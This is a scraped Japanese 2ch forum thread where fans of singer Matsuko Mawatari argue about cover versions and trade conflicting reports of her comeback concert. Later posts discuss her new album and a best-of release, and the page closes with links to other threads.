あ〜社会性のある方は本人に直接コンタクトしてみてください
「1人」のキッドがだだこねてるもので

233 :
さよなら

234 :
>>212
バラブシュカの中では
womanwomanとバースデーがのしかかるのベースがやたらめったらかっこいと思う
これも本人でアレンジしたとは

235 :
むなしく叫んでも顔見るには地元付近にいくしかないもんな・・・
しかも何年も前から歌ってほしいってみんないってるけど
今後も変化なしにそろそろきづかないと

236 :
なぜ干されたと言ってて引退宣言せんのだ
あのブログは仲間へのメール変わりか?

237 :
^^;

238 :
デビュー当時からのキャッチフレーズ「うそつき松子」
やったね!

^^;

239 :
声が太くてパンチはある、キレイなビブラートの歌手
程度の認識だな。

240 :
パンチ死語、ビブラートふるっw
昭和歌謡教室程度の目線だな

241 :
レーベルって宣伝へったくそだったよなー
バブル期だからシングル売り上げ命みたいな商売レベルで
勉強不足なんがしろうと目にもわかったわw

242 :
>>241
売れなきゃ販促費が積めないのに、
宣伝出すところが場違いだったりで…


243 :
>>241
おっと、名前変えるの忘れた…スマソ

244 :
さよならbyebyeは神!!本当神!

245 :
デイドリームジェネレーション!
しょこたんがカバーするとまた盛り上がる

246 :
     ____
   /__.))ノヽ
   .|ミ.l _  ._ i.)
  (^'ミ/.´・ .〈・ リ
  .しi   r、_) |  さよならbyebyeもわしが育てた
    |  `ニニ' /
   ノ `ー―i´

247 :
馬渡さん復活せんかなぁ・・

248 :
>>246
なんじゃそれw 演歌の世界かww

249 :
だれかMステ出たときの動画UPして

250 :
>>249
それみたい!!
もっと評価されるべき歌手だろこの人・・・

251 :
>>245
絶対やめてほしい
川本真琴の1/2やったのもうざかったわ
ファンからするとカバーとかしていらない

252 :
アニメ4曲ファンとアルバム40曲ファンに分かれるからなあ
深く知ってるアルバムファンからすれば
どうぞご自由にって感じ

253 :
>>252
へー
アルバムファンなんているんだー
アニメ以外の曲は全部同じに聴こえる
頭に残らないメロディー 歌詞もダサい
やっぱ声が良くて歌唱力あっても曲がダメだと売れないよねー

254 :
アルバムファンてほどじゃないが
君は今心臓破りとかナイスアンバランスとか好きだな

255 :
松任谷由実のファンて、だいたい40歳くらいからが多いでしょ?

256 :
てかアニメ4曲しか知らないとかアルバムファンとか区分けせんでも。
沢山知ってる自分すごい、アニメ4曲しか知らない人はにわか、
みたいな空気放たれるとイヤンな感じだわ
1曲でも好きな曲があるからここに来てるのにさ
カバーして欲しいして欲しくないは単なる個人の感覚の差だと思う…

257 :
>>253
www叩きたいだけの奴ってムキになるだけだから説得力ねえなあ
てめえは誰を認めてるのか聞いてみたいよ いえないだろw

258 :

四曲ともアルバムに含まれてんのにさwあるばむふぁんて思う人は
ひっくるめて好きに決まってるやんけ
どうぞご自由にって大らかで区分けしてないイイかんじ
作る人って他の人にも歌われるのは栄誉だし、
うれしくない人なんていないんじゃないか?
そこをすなおに共によろこべないで
カバーする者をけなし、作品をけなし、作曲、作詞家までけなし、
断固拒否してる自分はすごいって。思い切り区分けでイヤンなかんじ、、、
どこがファンやねんw音楽きらいなんか?
以外ぜんぶ同じに聞こえる、売れないとか
どんだけ重症ひきこもりオタで商業至上主義で音楽のセンスないんだよ



259 :
>>258
間違いない
アルバムはただ世に浸透してないだけ、微笑みの爆弾以外の三曲は幽白を考えて作ったわけじゃないからその四曲だけ良いってのはあきらかにおかしい話。
他の曲も幽白で使われてたら絶対ヒットしただろうなって曲もいくつかあるし。
だからその4曲ファンかアルバムファンとかで区別する意味はわからん。
アニメで好きになったからその4曲が好きってファンは多いだろうけどそれはアルバムをしらないだけでアルバムは嫌いってわけじゃないだろ。
てか売れてる曲が良い訳じゃない
とりあえず馬渡松子の復活を願いたいね。
ブログでみるかぎりじゃ地元でちょこちょこやってるみたいだけど
もったいないなぁ



260 :
>>256の言うとおりだと思う
>>252みたいな人ははっきり言って人としてどうかと思う
>>258は的外れすぎてかわいそうだとは思う

261 :
>>253
自分に自信がない人間ほど物事を批判することでしか
己の存在価値を見出せないという定説を証明したかったのですねわかります
260

262 :
そんなことより馬渡姫の話しよぜ!
今日もデイドリームジェネレーション聴く俺
馬渡中毒者はこの時代もういないのか?

263 :
>>260
他の歌手をここでなじるなんてのが一番的外れということに気づかないのはみじめだな
ところであんた、誰のファンなの?
>>262
おーきもちいいねー馬渡中毒とは笑
おれはデイドリームも好きだけどホームワークもやっぱリピートする
アルバム持ってないけど被害妄想とかやっかみはないな、
ニコニコでGLASSICAって曲きいてぶっとんでから何度かききにいってる
こころのままにもこころにのこるるるるw

264 :
やっぱさぁ、復活は本人の気持ち次第だよね

先日亡くなった、元TV制作者の横沢さんはメディアレモラスレーベルの
発足に絡んだ1人でしたね…
V−ジャパンが洋楽部分は東芝EMIに移動して、国内はEPOだけが
東芝EMI移籍だったな。あとは全部メディアレモラスが引き取った。

265 :
歌声は好きだが歌詞が嫌いだ

266 :
>>262
デイドリームジェネレーションの歌詞いいよなー
グラシカの歌詞もテラかっけー 基、ZIPなんかも
メロディも好きだ 
馬渡ファンだぜ!自分に自信ある

267 :
>>258 >>261 >>263
お前、最高にキモいよ

268 :
>>264
皆が想像するようなはなばなしい復活はむずいんじゃないかな
精神的環境的にも本人一人の力じゃさ 誰か強力な仕掛け人が現れないと・・・
>>267
お前、最高にスカだよ

269 :
ベストアルバム聴いたら声が別人みたいになってるな。

270 :
おいなんだよこのスレ・・・。気持ち悪いくらいのマンセーカキコしてるのは一人だけだし、
否定レスに対してもいちいちファビョってるのはそいつだけじゃねえか。
メール欄がたまに全角になってるぞ。
>>268のおっさん、あんたのことだよ。工作員乙。

271 :
なんかここ、論破できなければ罵声に走る〜
みたいなおこちゃま雑魚がべたついてますね。
まともな内容の論議は苦手そう。

272 :
当時はライヴビデオとかプロモとかの販売はなかったのかしらぁ?
復活?ライヴやって欲しいケド、無理ならせめて昔の映像がみたいと思い…
昔からファンで詳しい人教えて下さい。

273 :
ワザワザ重厚なはなししてくれるおじさん達けとばしたらほとんどアンチスレ
むきにネト用語全開でどや顔工作なんてちっせえ
いちいち毒はくなよな...

274 :
ちょ、218と219なんてもろ自演wwwこんな馬鹿ひっさびさに見たわwwwww
つーか誰か気付けよwww
でもこんな過疎スレで自演なんて一体誰が得すんの?
基本的には昔の人だし、自演するほどの狂信者はさすがにいないんじゃ
まさか本人?そんな感じはしないけどなぁ
>>273
お前はいいかげんこのスレから出てったほうがいいと思う

275 :
話がめちゃくちゃだな笑
とりあえずこのまま馬渡松子って名前だけが一人歩きしちゃって可愛そうだ
微笑みの爆弾はまたカバーされるみたいだけど
個人的には他の曲も是非もう一度世に出回ってほしいなぁ

276 :
これまでの流れを読んでみて思ったのだけれど、
自演をしていたのは作詞の人ではないかと思った

277 :
てか普通に考えたら自演しても本人らになんのメリットもないからしないんじゃないかな・・・


278 :
売れない作詞家による自演か。

279 :

おばさん まだファンいるの?


280 :
アイドルじゃないんだからおばさんだろうが若かろうが関係ないよーな
歌だろ歌


281 :
当時のライブの話とか聞きたいです。だれかリアルタイムで見てた人いるのでしょうか?

282 :
さよならbyebye・・・

283 :
>>>274
おい、へなちょこw

284 :
馬渡松子がアニフェスに出演!
やばいだろ、、
いくしかない  


285 :
凄い好みの声。
90'sのポワンポワンした切ない音楽にぴったりだと思う。

286 :
誰か行った奴いないのかよ
すげー気になる

287 :
>>286
行ったよ。
まだ大阪が終わったばっかで、今書くとネタバレになりそうだな。
……それ以前に書いていいものか迷うネタが。正直誰か書いてるかなーと思ってたんだけど。
問題ないなら詳細めいたことを書くけど。どうしようか?

288 :
是非書いて下さい

289 :
>>287
是非お願いします!!!

290 :
かなりきついよ?
正直俺は引いたからねー。
ここで書いちゃうとGoogle様にも捕捉されるから本人サイドの目に触れるかもしれんし。

1個だけ。
「なんか呼び方を決めようか?」とMCが話を振って、何故かそれが「マツコ」と。
場内から一斉にマツココールw

291 :
演奏はどうだった?もはや歌には期待してないので
演奏陣が良ければ(原曲に忠実とかアレンジでもクオリティ高いとか)行ってみようかなと迷ってる

292 :
>>291
>演奏はどうだった?
>演奏陣が良ければ(原曲に忠実とかアレンジでもクオリティ高いとか)行ってみようかなと迷ってる
それに関しては良くも悪くもアニソンイベントであるとしか。
アレンジとかしようものならみんな大暴れ。途中のリードギターのソロ以外は一音も逃さず原曲通りだと思う。
ただ演奏の質とか分かんないわ。バンドというかスタジオミュージシャンを連れてきましたみたいなもんじゃねーかなー?

293 :
>>292
ありがとうございます!
ライブで完コピか…
アニメのイベントならではなのかな。
松子さんいろいろあったんですね。

294 :
>>292
アリガトゴザイマス!

295 :
そいじゃ、覚えてる限りで書いてみるか。
読みたくない人は透明あぼーん推奨。それと抜けてるところも多々あるのでそこんとこよろしく。


最初に司会MCが「初登場の幽遊白書でお馴染み、馬渡松子さんです!」と紹介。会場盛り上がる。
「微笑みの爆弾です!」と紹介と同時にイントロ。そして馬渡松子さんステージに。
ものっそい畏まったお辞儀。そして歌い出す。
ほぼ変わらない歌声に会場もヒートアップ。「どっちだろー!」は会場全員が自然と合唱w
1コーラスも「アリガトゴザイマス!」でしっかり締め。ここまでは良かった。
また縮こまったお辞儀。
2コーラス入ったところから様子が変わる。もう嗚咽が止まらないみたいで「ひとりーぼっちー」すらかすれてる。二回目の「どっちだろー!」は全然出ない。会場も変な空気になる。喉をやっちゃったみたいな声。
何だか聞いてるこちらも申し訳ない気持ちになってきた('A`)
本来一番盛り上がるはずのラストパート。「めっちゃめちゃー」で音程すら怪しくなってきてるので、聴いてて辛くなる。「いーるんだろうねー」はとうとう裏声で出そうとしたけど失敗、な状態。最後の「ホホエミノバクーダン!」もヨレヨレで終了。
後半続く。

296 :
歌い終えた後にお辞儀。あり得ないレベルでちっちゃくなる、土下座してるみたいに錯覚起こしそうになる。
そこから本人MC。
「14年ぶりです。最近はあちこちにお詫び行脚してます」
「引退するつもりだったんですけど高橋ヒロさんの事もあったし、遺志は継がなきゃと思って帰ってきました」
他にも話してたんだが、ほとんど「ごめんなさい」ばっかり。それしか印象に残ってない。
「それでは聴いて下さい。サヨナラBye-bye」さすがに歌えるのかと思った。無茶なんじゃないかと。
案の定最初からまともに歌えない。こっちも逃げ出したくなる。
「サヨナラBye-bye、元気でいてね」の部分が違う意味に聞こえて仕方ない。
しかも原曲通りにリフレインが続く。もはや辛くてしょうがない。それでも歌い続ける馬渡松子さんが痛々しいというか晒し者になってるみたいに見えてくる。コレ何の罰ゲーム?
会場にはドン引きを超えて訳の分からないピリピリした緊張感が漂う。
何とか歌いきった。会場からおざなりじゃなく、かといって熱狂的でもない拍手。
出てきた司会が開口一番、「まあ年月を経て声も変わっちゃうこともありますよね」とフォロー。……アニソン40周年の水木一郎とか70歳を越えたささきいさおがいるところで言われてもねー。

297 :
むー、だいぶ抜け落ちてるな。まだ触れないといけないことがあったと思うんだが?
でもイメージは伝わったと思う。
俺はステージから離れたところにいたんで(近くには常連さんっぽいのが首タオルで万全の構えを敷いてるから近付けないんだよw)、表情はハッキリ見えなかった。
涙グシャグシャなのは分かった。髪も振り乱したみたいで貞子みたいになってるし。
とりあえずこんくらいで。他に思い出したことがあれば追加するかも。

298 :
追記もありがとうです。
いろいろ伝わりました。
心中お察しします(このスレ来る時点でみんな似たような思い持ってると思うので)

299 :
レポートありがとうございます!
馬渡さんずっと一生大好きだから、無理しなくてもいいと思いました。

300 :
あんまり鵜呑みにするなよ

301 :
確かに2ちゃんの一人の書き込みを鵜呑みにするのは良くない
馬渡さんをかわいそうだと目で最初から見てたら
先入観を持って見ちゃうからな
自分が引いてたから会場全体が引いたと錯覚したのかもしれない
俺は昨日名古屋に見に行ったけど
馬渡さんの声が致命的なほどかすれたりもしてなかったし
会場がドン引きしてるなんてこともなかった
本人のトークもごめんなさいじゃなくて
苦難を乗り越えてここまできました、これからも頑張ります
好きなものを我慢したかわりに、また新たなすきなものができた、
みたいな前向きなものだったように思う

302 :
>>301
ありがとう!
外タレのクラブイベントなんて口パクばっかりなのに、ブランクあるなかちゃんと歌ってるんだから、凄いと思う。

303 :
幽遊白書を描いてた漫画家は今も第一線で活躍してるのに
この人に落ちぶれっぷりは凄いな

304 :
自演してたおっさんはまだここ見てるんだろうか

305 :
馬渡さんは今 宮崎でボーカル講師をしてる。
宮崎では結構有名なダンススクールの中でたくさんの生徒を持ってる。
とくに子供たちからは「松子せんせー!」みたいに呼ばれてて、
結構いい先生かも。

306 :
馬渡さん
大好きです
応援してます

307 :
一度だけ、馬渡さんと直接メッセ交換した事がある。
旦那さんは社会の先生で、私の地元にも観光で来た事があるとか
色々書いてくれてて嬉しかったなぁ。
図々しいかと思ってその後はそれきりだったけど。
アルバムは全部持ってる。ほんと馬渡さんの歌声好きだ。
中学の頃、友達に色々協力してもらって学校サボってライブ見に行った。
バラブシュカツアー良かったなぁ。
馬渡さん大好き。

308 :
馬渡松子がついに本気出してるね
blog見たら伝わってきたhttp://open.saloon.jp/
ついに聴けるのか、不安ではあるが期待せずにはいられない

309 :
わくわく

310 :
馬渡松子 NEW ALBUM 『KISEKI』2012/5/4発売 MINIPV・インタビュー
http://youtu.be/Dcpv8QRoN8A

311 :
予約したぜよ
PVはなぜそんな難しい曲をセレクトしたんだ…

312 :
連休中に聴きたかったけど届きそうにないな
直販じゃないから遅れも仕方ないか
むうう

313 :
今日アマゾンから届いてた
あの悪い意味の衝撃からしたらずいぶんまともになってる気がする
もちろん全盛期の歌声を期待して聞いたらがっかりするだろうけど
どのくらい持ち直していけるものなのかこのまま見守って行きたいわ

314 :
今日きたよー
これは…正直残念…

315 :
自分も今日手にした
Time on Timeが一番もどかしい
すごく良い詞と曲なのに
メロディが声に無理やり合わせられていると感じた
自由に歌える前提なら凄い歌になったんじゃないか
発売自体は本当に嬉しいのでしばらくじっくり聴き込みます

316 :
今回のリリースとリーシャウロン氏のサイトが閉じてしまった事は
何か関係あるのかなぁ。

317 :
閉じてないよ
なぜか検索に引っかかりにくくしたみたいだ
何か意図があるなら宣伝するのもアレだから直接は張らないけど
画像検索で探した方がたどり着きやすいと思う

318 :
>>316
ありがとう。久々にサイト見れました!
お気に入りに入れといたのに急に繋がらなくなってしまって・・・

319 :
東京、岩手でライブか!!

320 :
届いた日にしか聴いてない
人間って正直なもんです

321 :
がんばれ

322 :
この人の声ってアンニュイだよね

323 :
リーシャウロン氏のブログはわかったんですが、webサイトのほうが見つかりません。
わかる方教えてください。

324 :
腕立て伏せの腕を曲げない状態で静止&発声

325 :
ライブして

326 :
やってないの?

327 :
ライブは多分ちょくちょくやってくれる

328 :
リーシャウロン氏のブログで、ウェブサイトに動画をアップしたと書いているのに
そのウェブサイトが公開されてないってどういうこと?設定ミス?
リーシャウロン氏本人に尋ねたいんだけど、連絡手段がない 
動画アップしてくださるのは、すごく嬉しいありがたいことなんだけどね。

329 :
公開されてないわけじゃあないよ
前にブログかコメ欄かで一日のアクセスは50くらいが良いみたいなこと言ってたから
わざと見つかりにくくしてるんだと思う
検索からたどり着ける方法探してるけど
確かに存在がわかってても全然行けないわ。
前は画像検索ですぐトップページの画像に行けたんだけどな

330 :
ライブドアから検索したらサイトは出てくるんだけど、
Forbiddenエラーしかでない。 
「サイトはあるがアクセスする権限はないです」っていうことらしいのですが、
それが自分だけなのかが気になります。

331 :
本当だグーグル・ヤフーでいろんな言葉で検索してばかりで試してなかったけど
ライブドア、Bingとかだとちゃんと引っかかるわ
そして自分は問題なく見られた

332 :
そうでしたか... ありがとうございます。

333 :
復活おめ
ガンバレ!
俺も頑張る

334 :
ライブ最高でした!!
パワフルボイスが健在で嬉しかった
元気貰った、復活本当にありがとうございます

335 :
ライブ結構人きた?
今のうちにチケット買っとこうかな

336 :
あ、ごめんまだ始まってなかった…orz

337 :
最近活動が積極的で嬉しいね
全国回ってるから色々な箇所で観れる
松子さん、マイペースで頑張れ

338 :
保守

339 :
メチャメチャ〜

340 :
やっとKISEKI聞いた!他の人に出来ない音楽!
ライブはなんか行くの怖いな

341 :
BEST OF MATSUKO MAWATARI 2013.11.20 ON SALE 
01.微笑みの爆弾
02.ホームワークが終わらない
03.さよならbyebye
04.デイドリーム・ジェネレーション
05.帰りたい
06.ついてかない
07.PREMONITION
08.GLASSICA
09.P-U
10.ZIP
11.君は今心臓破り
12.男友達
13.基-motoi-
14.らしくもないね
15.こころのままに
16.情けあるよ (Bonus Track)

342 :
ベスト版はリマスターでしょうか?

343 :
発売記念東北ライブやるよ
初日は新宿だ
最終日は渋谷だし
詳しくはhpのopensalonで

344 :
ベストはリマスターということです。
ボーナストラックは新録音とのこと
昔のCDが手に入らないので買うしか

345 :
情報ありがとうございます!
インストアルバム以外は全てもっていますが
如何せん音が小さいです。
リマスターなら買いですね。

346 :
アマゾン情報で12月にはカラオケバージョンも出るみたいですね!

347 :
Amazon見たらリバースと曲目ほとんど同じだった

348 :2013/10/25
カラオケはベストに収録すればいいのに
松子さんの意志でないだろうがなんかね
ベスト出るのは大感謝だよ
TOP カテ一覧 スレ一覧 2ch元 削除依頼
【小児】jessica☆ジェシカ【十字軍】 (329)
【原宿ガール】きゃりーぱみゅぱみゅ vol.8 (145)
熊木杏里 〜その46〜 (143)
【元ZONE】西村朝香 (637)
◆☆◆中森明菜◇★◇Part69 (113)
Rie fu Part10 (725)
--log9.info------------------
【Act-Race】アクトレース★1【サミットクラブ】 (126)
【森田】さらば青春の光 part3【東口】 (169)
フィフィ part3 (103)
ベネディクト カンバーバッチ Benedict Cumberbatch part22 (898)
【KARA】ニコル応援スレ☆39【おぺろあっあーん】 (684)
【KARA】スンヨン応援スレ☆171【WeWillRockYou】 (816)
【SNSD】少女時代 650【Girls' Generation】 (522)
【KARA】ク・ハラ応援スレ☆154【腹美人】 (917)
KARA専用スレ【アンチお断り】 (120)
KARA情報まとめスレ (287)
【KARA】ジヨン応援スレ☆51【ヤングマン or 学園天国】 (359)
【T-ARA】 ティアラ 187【since 2009】 (165)
【SNSD】ユナ応援スレ☆70【YoonA】 (878)
【YG】BIGBANG93【V.I.P】 (307)
【エーピンク】A Pink シーズン18【清純派6人組】 (981)
【Rania,AOA】韓国女子B級アイドル44【BESTie,TREN-D】 (582)
--log55.com------------------
【普天間】「どうにかしてほしい」市民から悲鳴 普天間飛行場で過去最高の124・5デシベル 人間の聴力の限界に迫る騒音
なぜここまで放置した? 反基地活動家の妨害に苦しむ業者の余りにも悲しい現実 ネット「警察と自衛隊で反対派を排除すればいい
【岩屋防衛相】対韓関係「いろいろ問題は起きたが、元の関係に戻したい」
岩屋防衛相「いろいろ問題は起きたが、元の日韓関係に戻したい」 ネット「辞任か更迭で」「小野寺さんに戻って…」「自衛官がかわいそう
【反日パヨク発狂】記者「記者は国民の代表」 →世論調査の結果「記者は国民の代表ではない」78%
【トランプ大統領】千秋楽観戦で…正面マス席1000席確保の大困惑
志位和夫「最低賃金を直ちに全国一律1000円に引き上げ…」 ネット「お隣の国、それやって奈落の底に墜ちているんですけど…
岩屋防衛相の発言に、石平「この程度の政治家が防衛大臣となったことは安倍政権の大失敗、日本にとっての危機」 ネット「早く更迭…